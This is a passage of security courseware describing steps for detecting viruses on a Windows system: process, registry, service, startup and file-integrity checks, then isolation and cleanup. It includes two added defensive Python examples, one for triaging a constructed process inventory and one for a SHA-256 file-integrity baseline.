Scan for files and folders integrity: Check the data files for modification or manipulation by opening several files and comparing the hash value of these files with a pre-computed hash. Use tools such as FCIV, TRIPWIRE, and SIGVERIF.


Penetration Testing for Viruses (Cont'd)

Step 6: Scan the system for running processes
You should scan your system for suspicious running processes. You can do this by using tools such as What's Running, HijackThis, etc.

Step 7: Scan the system for suspicious registry entries
You should scan your system for suspicious registry entries. You can do this by using tools such as jv16 PowerTools and RegShot.

Step 8: Scan the system for Windows services
You should scan for suspicious Windows services running on your system. You can do this by using tools such as SrvMan and ServiWin.

Step 9: Scan the system for startup programs
You should scan your system for suspicious startup programs. Tools such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs.

Step 10: Scan the system for files and folders integrity
You should scan your system for file and folder integrity. You can do this by using tools such as FCIV, TRIPWIRE, and SIGVERIF.
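The tools named in steps 6 to 9 produce an inventory of processes, registry entries, services and startup programs; deciding which entries are worth a closer look is still manual work. The following is an added example (not courseware code and not the output of any of those tools) of the triage rules a reviewer applies to that inventory: whether the program is recognized, whether it runs from a user-writable location, whether its name or path imitates a Windows system binary, and whether it is signed. The inventory, the allowlist of recognized programs and the system-directory list are all constructed and hypothetical.

```python
"""Added example (not part of the CEH courseware): triage rules for the
inventory gathered in steps 6 to 9 (running processes, registry entries,
services, startup programs). Instead of enumerating a live system, as the
tools named above do, it takes a constructed inventory and applies the
checks a reviewer makes by hand. The allowlists are hypothetical."""
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import List

# Hypothetical, deliberately small lists for the demo.
SYSTEM_BINARIES = sorted({"svchost.exe", "lsass.exe", "explorer.exe", "csrss.exe", "winlogon.exe"})
SYSTEM_DIRS = {"c:/windows/system32", "c:/windows/syswow64", "c:/windows"}
RECOGNIZED = {"c:/program files/demo corp/demoapp.exe", "c:/program files/demo av/avagent.exe"}
USER_WRITABLE = ("/appdata/local/temp/", "/downloads/", "/temp/", "/users/public/")


@dataclass
class Entry:
    kind: str     # "process", "service", "startup" or "registry"
    name: str     # process, service or Run-key value name
    image: str    # full path of the executable
    signed: bool  # a valid Authenticode signature is present


@dataclass
class Verdict:
    entry: Entry
    level: str                  # "known", "unrecognized" or "suspicious"
    reasons: List[str] = field(default_factory=list)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot look-alike names (scvhost vs svchost)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(entry: Entry) -> Verdict:
    image = PureWindowsPath(entry.image).as_posix().lower()
    directory, _, exe = image.rpartition("/")
    reasons: List[str] = []
    if exe in SYSTEM_BINARIES:
        # A genuine system binary name outside the system directories is the
        # classic masquerade.
        if directory not in SYSTEM_DIRS:
            reasons.append(f"{exe} running from {directory}, not a Windows system directory")
    else:
        lookalikes = [s for s in SYSTEM_BINARIES if edit_distance(exe, s) <= 2]
        if lookalikes:
            reasons.append(f"name imitates system binary {lookalikes[0]}")
    if any(marker in image for marker in USER_WRITABLE):
        reasons.append("executable lives in a user-writable location")
    if reasons:
        if not entry.signed:
            reasons.append("executable is unsigned")
        return Verdict(entry, "suspicious", reasons)
    if image in RECOGNIZED or (exe in SYSTEM_BINARIES and entry.signed):
        return Verdict(entry, "known")
    notes = ["not in the baseline; look up the publisher before trusting it"]
    if not entry.signed:
        notes.append("executable is unsigned")
    return Verdict(entry, "unrecognized", notes)


# Constructed inventory, as the scanning tools might have listed it.
DEMO_INVENTORY = [
    Entry("process", "svchost.exe", r"C:\Windows\System32\svchost.exe", True),
    Entry("process", "svchost.exe", r"C:\Users\bob\AppData\Local\Temp\svchost.exe", False),
    Entry("startup", "Updater", r"C:\Users\bob\Downloads\scvhost.exe", False),
    Entry("service", "DemoApp", r"C:\Program Files\Demo Corp\DemoApp.exe", True),
    Entry("registry", "HelperSvc", r"C:\Program Files\Unknown Vendor\helper.exe", True),
]


def triage_all(entries=None) -> List[Verdict]:
    return [triage(e) for e in (entries if entries is not None else DEMO_INVENTORY)]


if __name__ == "__main__":
    for v in triage_all():
        print(f"[{v.level:12}] {v.entry.kind:8} {v.entry.image}")
        for r in v.reasons:
            print("              -", r)
```

The "unrecognized" level is the one that feeds the slide's advice to collect more information from the publisher's website: an entry that is neither in the baseline nor obviously wrong is a research item, not yet a finding.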


Penetration Testing for Virus (Cont'd)

Scan for modification to OS files: Check the critical OS file modification or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy. Use tools such as FCIV and TRIPWIRE.
Document all the findings: Document all your findings in the previous steps; it helps in determining the next action if viruses are identified in the system.
Isolate the machine from the network: Isolate the infected system from the network immediately to prevent further infection.
Update and run antivirus: Sanitize the complete system for viruses using an updated anti-virus.
Find other anti-virus solutions to clean viruses.


Penetration Testing for Viruses (Cont'd)

Step 11: Scan the system for critical OS modifications
You can scan for critical OS file modifications or manipulation using tools such as TRIPWIRE, or by manually comparing hash values if you have a backup copy.

Step 12: Document all findings
These findings can help you determine the next action if viruses are identified on the system.

Step 13: Isolate the infected system
Once an infected system is identified, you should isolate it from the network immediately in order to prevent further infection.

Step 14: Sanitize the complete infected system
You should remove virus infections from your system by using the latest updated antivirus software.
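Steps 10 and 11 both come down to the same check: compare the hash of each file against a hash recorded when the system was known to be good, which is what FCIV and Tripwire automate. The following is an added example, not code from the courseware or from either tool, of that baseline-and-verify cycle: a manifest of SHA-256 digests is written first, and a later run reports files that were modified, added or removed. Hashes rather than timestamps are compared because a modification time is trivial to reset. The directory layout and sample files are constructed for the demonstration.

```python
"""Added example (not part of the CEH courseware): a file-integrity check of
the kind steps 10 and 11 describe. A baseline manifest of SHA-256 digests
is recorded while the system is known-good; a later verification run
reports files that were modified, added or removed. Paths and sample files
are constructed for the demo."""
import hashlib
import json
from pathlib import Path
from typing import Dict


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root: Path) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its digest."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def build_baseline(root: Path, manifest: Path) -> Dict[str, str]:
    """Record the known-good state. Keep the manifest outside root (ideally
    off-host or on read-only media) so that whoever alters the files cannot
    also rewrite the baseline they are checked against."""
    digests = snapshot(root)
    manifest.write_text(json.dumps(digests, indent=2, sort_keys=True))
    return digests


def verify(root: Path, manifest: Path) -> Dict[str, list]:
    """Compare the live tree with the baseline manifest."""
    baseline = json.loads(manifest.read_text())
    current = snapshot(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
        "unchanged": sorted(p for p in baseline if current.get(p) == baseline[p]),
    }


def demo(base: Path) -> Dict[str, list]:
    """Constructed scenario: baseline three files, then change the tree the
    way an infection might (overwrite one file, drop a new one, delete one)
    and verify."""
    root = base / "system"
    (root / "bin").mkdir(parents=True)
    (root / "bin" / "hostname.exe").write_bytes(b"original binary\n")
    (root / "bin" / "net.exe").write_bytes(b"another original binary\n")
    (root / "config.ini").write_bytes(b"setting=1\n")
    manifest = base / "baseline.json"
    build_baseline(root, manifest)
    (root / "bin" / "hostname.exe").write_bytes(b"original binary\n" + b"extra bytes\n")
    (root / "bin" / "dropped.exe").write_bytes(b"new unexpected file\n")
    (root / "config.ini").unlink()
    return verify(root, manifest)


if __name__ == "__main__":
    import tempfile
    for category, files in demo(Path(tempfile.mkdtemp())).items():
        print(f"{category:10}", files)
```

In practice the "modified" list is what step 11 is after (a changed OS file), the "added" list is where dropped executables show up, and the manifest itself belongs with the findings documented in step 12.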


Module Summary

A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across network connections independently without human interaction.
Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met.
Viruses are categorized according to the file they infect and the way they work.
The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation and elimination stages.
A computer gets infected by viruses, worms and other malware due to not running the latest anti-virus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected e-mail attachments or downloading files without properly checking the source.
Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used to create malware without any technical knowledge.
Virus detection methods include system scanning, file integrity checking and monitoring OS requests.
Virus and worm countermeasures include installing anti-virus software and following an anti-virus policy for safe computing.

Module Summary

A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across network connections independently without human interaction. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met. Viruses are categorized according to the file they infect and the way they work. The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation, and elimination stages. A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without properly checking the source. Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used to create malware without any technical knowledge.


Virus detection methods include system scanning, file integrity checking, and monitoring OS requests. Virus and worm countermeasures include installing antivirus software and following antivirus policies for safe computing.
